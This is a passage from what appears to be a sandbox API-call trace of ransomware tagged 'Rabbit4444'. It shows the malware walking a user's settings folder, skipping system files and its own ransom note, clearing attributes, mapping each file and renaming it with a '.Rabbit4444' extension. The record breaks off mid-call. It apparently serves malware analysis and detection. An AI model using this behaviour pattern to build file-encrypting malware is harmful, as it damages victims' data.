[0056.263] lstrcmpiW (lpString1="aaa_Classic_{728047C0-00D2-4FDB-A069-06338B92E93B}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.263] lstrcmpiW (lpString1="aaa_Classic_{728047C0-00D2-4FDB-A069-06338B92E93B}.settingcontent-ms", lpString2=".") returned 1 [0056.263] lstrcmpiW (lpString1="aaa_Classic_{728047C0-00D2-4FDB-A069-06338B92E93B}.settingcontent-ms", lpString2="..") returned 1 [0056.263] lstrcmpiW (lpString1="aaa_Classic_{728047C0-00D2-4FDB-A069-06338B92E93B}.settingcontent-ms", lpString2="windows") returned -1 [0056.263] lstrcmpiW (lpString1="aaa_Classic_{728047C0-00D2-4FDB-A069-06338B92E93B}.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.263] lstrcmpiW (lpString1="aaa_Classic_{728047C0-00D2-4FDB-A069-06338B92E93B}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.264] lstrcmpiW (lpString1="aaa_Classic_{728047C0-00D2-4FDB-A069-06338B92E93B}.settingcontent-ms", lpString2="boot") returned -1 [0056.264] lstrcmpiW (lpString1="aaa_Classic_{728047C0-00D2-4FDB-A069-06338B92E93B}.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.264] lstrcmpiW (lpString1="aaa_Classic_{728047C0-00D2-4FDB-A069-06338B92E93B}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.264] lstrcpyW (in: lpString1=0x130ec22, lpString2="aaa_Classic_{728047C0-00D2-4FDB-A069-06338B92E93B}.settingcontent-ms" | out: lpString1="aaa_Classic_{728047C0-00D2-4FDB-A069-06338B92E93B}.settingcontent-ms") returned="aaa_Classic_{728047C0-00D2-4FDB-A069-06338B92E93B}.settingcontent-ms" [0056.264] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\aaa_Classic_{728047C0-00D2-4FDB-A069-06338B92E93B}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.264] lstrlenW (lpString="aaa_Classic_{728047C0-00D2-4FDB-A069-06338B92E93B}.settingcontent-ms") returned 68 [0056.264] lstrlenW (lpString="Rabbit4444") returned 10 [0056.264] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.264] lstrlenW (lpString=".dll") returned 4 [0056.264] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.264] lstrlenW (lpString=".lnk") returned 4 [0056.264] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.264] lstrlenW (lpString=".ini") returned 4 [0056.264] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.264] lstrlenW (lpString=".sys") returned 4 [0056.264] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.264] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\aaa_Classic_{728047C0-00D2-4FDB-A069-06338B92E93B}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_classic_{728047c0-00d2-4fdb-a069-06338b92e93b}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.264] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.264] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14757522845) returned 1 [0056.265] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1011) returned 1 [0056.265] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0056.265] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102150 [0056.265] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x700, lpName=0x0) returned 0x298 [0056.266] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x700) returned 0x70000 [0056.266] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.267] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0056.267] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.267] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0056.267] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.267] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0056.267] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.267] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0056.267] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14757774476) returned 1 [0056.267] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0056.267] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102150 | out: hHeap=0xe0000) returned 1 [0056.267] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.267] CloseHandle (hObject=0x298) returned 1 [0056.267] CloseHandle (hObject=0x278) returned 1 [0056.267] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\aaa_Classic_{728047C0-00D2-4FDB-A069-06338B92E93B}.settingcontent-ms.Rabbit4444") returned 196 [0056.267] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\aaa_Classic_{728047C0-00D2-4FDB-A069-06338B92E93B}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_classic_{728047c0-00d2-4fdb-a069-06338b92e93b}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\aaa_Classic_{728047C0-00D2-4FDB-A069-06338B92E93B}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_classic_{728047c0-00d2-4fdb-a069-06338b92e93b}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.268] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee9ff5aa, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xee9ff5aa, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x231d0415, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3df, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="aaa_Classic_{7940ACF8-60BA-4213-A7C3-F3B400EE266D}.settingcontent-ms", cAlternateFileName="AAA_CL~3.SET")) returned 1 [0056.268] lstrcmpiW (lpString1="aaa_Classic_{7940ACF8-60BA-4213-A7C3-F3B400EE266D}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.268] lstrcmpiW (lpString1="aaa_Classic_{7940ACF8-60BA-4213-A7C3-F3B400EE266D}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.268] lstrcmpiW (lpString1="aaa_Classic_{7940ACF8-60BA-4213-A7C3-F3B400EE266D}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.268] lstrcmpiW (lpString1="aaa_Classic_{7940ACF8-60BA-4213-A7C3-F3B400EE266D}.settingcontent-ms", lpString2=".") returned 1 [0056.268] lstrcmpiW (lpString1="aaa_Classic_{7940ACF8-60BA-4213-A7C3-F3B400EE266D}.settingcontent-ms", lpString2="..") returned 1 [0056.268] lstrcmpiW (lpString1="aaa_Classic_{7940ACF8-60BA-4213-A7C3-F3B400EE266D}.settingcontent-ms", lpString2="windows") returned -1 [0056.268] lstrcmpiW (lpString1="aaa_Classic_{7940ACF8-60BA-4213-A7C3-F3B400EE266D}.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.268] lstrcmpiW (lpString1="aaa_Classic_{7940ACF8-60BA-4213-A7C3-F3B400EE266D}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.268] lstrcmpiW (lpString1="aaa_Classic_{7940ACF8-60BA-4213-A7C3-F3B400EE266D}.settingcontent-ms", lpString2="boot") returned -1 [0056.268] lstrcmpiW (lpString1="aaa_Classic_{7940ACF8-60BA-4213-A7C3-F3B400EE266D}.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.268] lstrcmpiW (lpString1="aaa_Classic_{7940ACF8-60BA-4213-A7C3-F3B400EE266D}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.268] lstrcpyW (in: lpString1=0x130ec22, lpString2="aaa_Classic_{7940ACF8-60BA-4213-A7C3-F3B400EE266D}.settingcontent-ms" | out: lpString1="aaa_Classic_{7940ACF8-60BA-4213-A7C3-F3B400EE266D}.settingcontent-ms") returned="aaa_Classic_{7940ACF8-60BA-4213-A7C3-F3B400EE266D}.settingcontent-ms" [0056.268] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\aaa_Classic_{7940ACF8-60BA-4213-A7C3-F3B400EE266D}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.270] lstrlenW (lpString="aaa_Classic_{7940ACF8-60BA-4213-A7C3-F3B400EE266D}.settingcontent-ms") returned 68 [0056.270] lstrlenW (lpString="Rabbit4444") returned 10 [0056.270] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.270] lstrlenW (lpString=".dll") returned 4 [0056.270] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.270] lstrlenW (lpString=".lnk") returned 4 [0056.270] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.270] lstrlenW (lpString=".ini") returned 4 [0056.270] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.270] lstrlenW (lpString=".sys") returned 4 [0056.270] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.270] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\aaa_Classic_{7940ACF8-60BA-4213-A7C3-F3B400EE266D}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_classic_{7940acf8-60ba-4213-a7c3-f3b400ee266d}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.270] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.270] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14758083726) returned 1 [0056.270] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=991) returned 1 [0056.270] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0056.270] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0056.270] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6e0, lpName=0x0) returned 0x298 [0056.271] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6e0) returned 0x70000 [0056.272] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.272] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0056.272] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.272] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0056.272] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.273] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0056.273] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.273] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0056.273] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14758347326) returned 1 [0056.273] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0056.273] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0056.273] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.273] CloseHandle (hObject=0x298) returned 1 [0056.273] CloseHandle (hObject=0x278) returned 1 [0056.273] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\aaa_Classic_{7940ACF8-60BA-4213-A7C3-F3B400EE266D}.settingcontent-ms.Rabbit4444") returned 196 [0056.273] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\aaa_Classic_{7940ACF8-60BA-4213-A7C3-F3B400EE266D}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_classic_{7940acf8-60ba-4213-a7c3-f3b400ee266d}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\aaa_Classic_{7940ACF8-60BA-4213-A7C3-F3B400EE266D}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_classic_{7940acf8-60ba-4213-a7c3-f3b400ee266d}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.277] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeef105ca, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xeef105ca, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x232db48a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3ed, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="aaa_Classic_{A88F43D0-B9C8-42F2-B9F3-90902FC0B22B}.settingcontent-ms", cAlternateFileName="AAA_CL~4.SET")) returned 1 [0056.277] lstrcmpiW (lpString1="aaa_Classic_{A88F43D0-B9C8-42F2-B9F3-90902FC0B22B}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.277] lstrcmpiW (lpString1="aaa_Classic_{A88F43D0-B9C8-42F2-B9F3-90902FC0B22B}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.277] lstrcmpiW (lpString1="aaa_Classic_{A88F43D0-B9C8-42F2-B9F3-90902FC0B22B}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.277] lstrcmpiW (lpString1="aaa_Classic_{A88F43D0-B9C8-42F2-B9F3-90902FC0B22B}.settingcontent-ms", lpString2=".") returned 1 [0056.277] lstrcmpiW (lpString1="aaa_Classic_{A88F43D0-B9C8-42F2-B9F3-90902FC0B22B}.settingcontent-ms", lpString2="..") returned 1 [0056.277] lstrcmpiW (lpString1="aaa_Classic_{A88F43D0-B9C8-42F2-B9F3-90902FC0B22B}.settingcontent-ms", lpString2="windows") returned -1 [0056.277] lstrcmpiW (lpString1="aaa_Classic_{A88F43D0-B9C8-42F2-B9F3-90902FC0B22B}.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.277] lstrcmpiW (lpString1="aaa_Classic_{A88F43D0-B9C8-42F2-B9F3-90902FC0B22B}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.278] lstrcmpiW (lpString1="aaa_Classic_{A88F43D0-B9C8-42F2-B9F3-90902FC0B22B}.settingcontent-ms", lpString2="boot") returned -1 [0056.278] lstrcmpiW (lpString1="aaa_Classic_{A88F43D0-B9C8-42F2-B9F3-90902FC0B22B}.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.278] lstrcmpiW (lpString1="aaa_Classic_{A88F43D0-B9C8-42F2-B9F3-90902FC0B22B}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.278] lstrcpyW (in: lpString1=0x130ec22, lpString2="aaa_Classic_{A88F43D0-B9C8-42F2-B9F3-90902FC0B22B}.settingcontent-ms" | out: lpString1="aaa_Classic_{A88F43D0-B9C8-42F2-B9F3-90902FC0B22B}.settingcontent-ms") returned="aaa_Classic_{A88F43D0-B9C8-42F2-B9F3-90902FC0B22B}.settingcontent-ms" [0056.278] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\aaa_Classic_{A88F43D0-B9C8-42F2-B9F3-90902FC0B22B}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.278] lstrlenW (lpString="aaa_Classic_{A88F43D0-B9C8-42F2-B9F3-90902FC0B22B}.settingcontent-ms") returned 68 [0056.278] lstrlenW (lpString="Rabbit4444") returned 10 [0056.278] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.278] lstrlenW (lpString=".dll") returned 4 [0056.278] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.278] lstrlenW (lpString=".lnk") returned 4 [0056.278] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.278] lstrlenW (lpString=".ini") returned 4 [0056.278] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.278] lstrlenW (lpString=".sys") returned 4 [0056.278] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.278] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\aaa_Classic_{A88F43D0-B9C8-42F2-B9F3-90902FC0B22B}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_classic_{a88f43d0-b9c8-42f2-b9f3-90902fc0b22b}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.278] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.279] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14758927943) returned 1 [0056.279] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1005) returned 1 [0056.279] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0056.279] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1018d0 [0056.279] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6f0, lpName=0x0) returned 0x298 [0056.281] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6f0) returned 0x70000 [0056.282] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.282] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0056.282] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.282] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0056.282] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.282] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0056.282] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.282] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0056.282] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14759309390) returned 1 [0056.282] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0056.282] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1018d0 | out: hHeap=0xe0000) returned 1 [0056.282] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.283] CloseHandle (hObject=0x298) returned 1 [0056.283] CloseHandle (hObject=0x278) returned 1 [0056.283] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\aaa_Classic_{A88F43D0-B9C8-42F2-B9F3-90902FC0B22B}.settingcontent-ms.Rabbit4444") returned 196 [0056.283] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\aaa_Classic_{A88F43D0-B9C8-42F2-B9F3-90902FC0B22B}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_classic_{a88f43d0-b9c8-42f2-b9f3-90902fc0b22b}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\aaa_Classic_{A88F43D0-B9C8-42F2-B9F3-90902FC0B22B}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_classic_{a88f43d0-b9c8-42f2-b9f3-90902fc0b22b}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.283] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef0418f5, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xef0418f5, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x233016ec, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x422, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="aaa_Classic_{E2E2F6CF-9D1A-4004-8999-8AB81010B5AC}.settingcontent-ms", cAlternateFileName="AA5F2E~1.SET")) returned 1 [0056.283] lstrcmpiW (lpString1="aaa_Classic_{E2E2F6CF-9D1A-4004-8999-8AB81010B5AC}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.283] lstrcmpiW (lpString1="aaa_Classic_{E2E2F6CF-9D1A-4004-8999-8AB81010B5AC}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.284] lstrcmpiW (lpString1="aaa_Classic_{E2E2F6CF-9D1A-4004-8999-8AB81010B5AC}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.284] lstrcmpiW (lpString1="aaa_Classic_{E2E2F6CF-9D1A-4004-8999-8AB81010B5AC}.settingcontent-ms", lpString2=".") returned 1 [0056.284] lstrcmpiW (lpString1="aaa_Classic_{E2E2F6CF-9D1A-4004-8999-8AB81010B5AC}.settingcontent-ms", lpString2="..") returned 1 [0056.284] lstrcmpiW (lpString1="aaa_Classic_{E2E2F6CF-9D1A-4004-8999-8AB81010B5AC}.settingcontent-ms", lpString2="windows") returned -1 [0056.284] lstrcmpiW (lpString1="aaa_Classic_{E2E2F6CF-9D1A-4004-8999-8AB81010B5AC}.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.284] lstrcmpiW (lpString1="aaa_Classic_{E2E2F6CF-9D1A-4004-8999-8AB81010B5AC}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.284] lstrcmpiW (lpString1="aaa_Classic_{E2E2F6CF-9D1A-4004-8999-8AB81010B5AC}.settingcontent-ms", lpString2="boot") returned -1 [0056.284] lstrcmpiW (lpString1="aaa_Classic_{E2E2F6CF-9D1A-4004-8999-8AB81010B5AC}.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.284] lstrcmpiW (lpString1="aaa_Classic_{E2E2F6CF-9D1A-4004-8999-8AB81010B5AC}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.284] lstrcpyW (in: lpString1=0x130ec22, lpString2="aaa_Classic_{E2E2F6CF-9D1A-4004-8999-8AB81010B5AC}.settingcontent-ms" | out: lpString1="aaa_Classic_{E2E2F6CF-9D1A-4004-8999-8AB81010B5AC}.settingcontent-ms") returned="aaa_Classic_{E2E2F6CF-9D1A-4004-8999-8AB81010B5AC}.settingcontent-ms" [0056.284] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\aaa_Classic_{E2E2F6CF-9D1A-4004-8999-8AB81010B5AC}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.284] lstrlenW (lpString="aaa_Classic_{E2E2F6CF-9D1A-4004-8999-8AB81010B5AC}.settingcontent-ms") returned 68 [0056.284] lstrlenW (lpString="Rabbit4444") returned 10 [0056.284] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.284] lstrlenW (lpString=".dll") returned 4 [0056.284] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.284] lstrlenW (lpString=".lnk") returned 4 [0056.284] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.284] lstrlenW (lpString=".ini") returned 4 [0056.284] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.284] lstrlenW (lpString=".sys") returned 4 [0056.284] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.284] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\aaa_Classic_{E2E2F6CF-9D1A-4004-8999-8AB81010B5AC}.settingcontent-ms" (normalized: 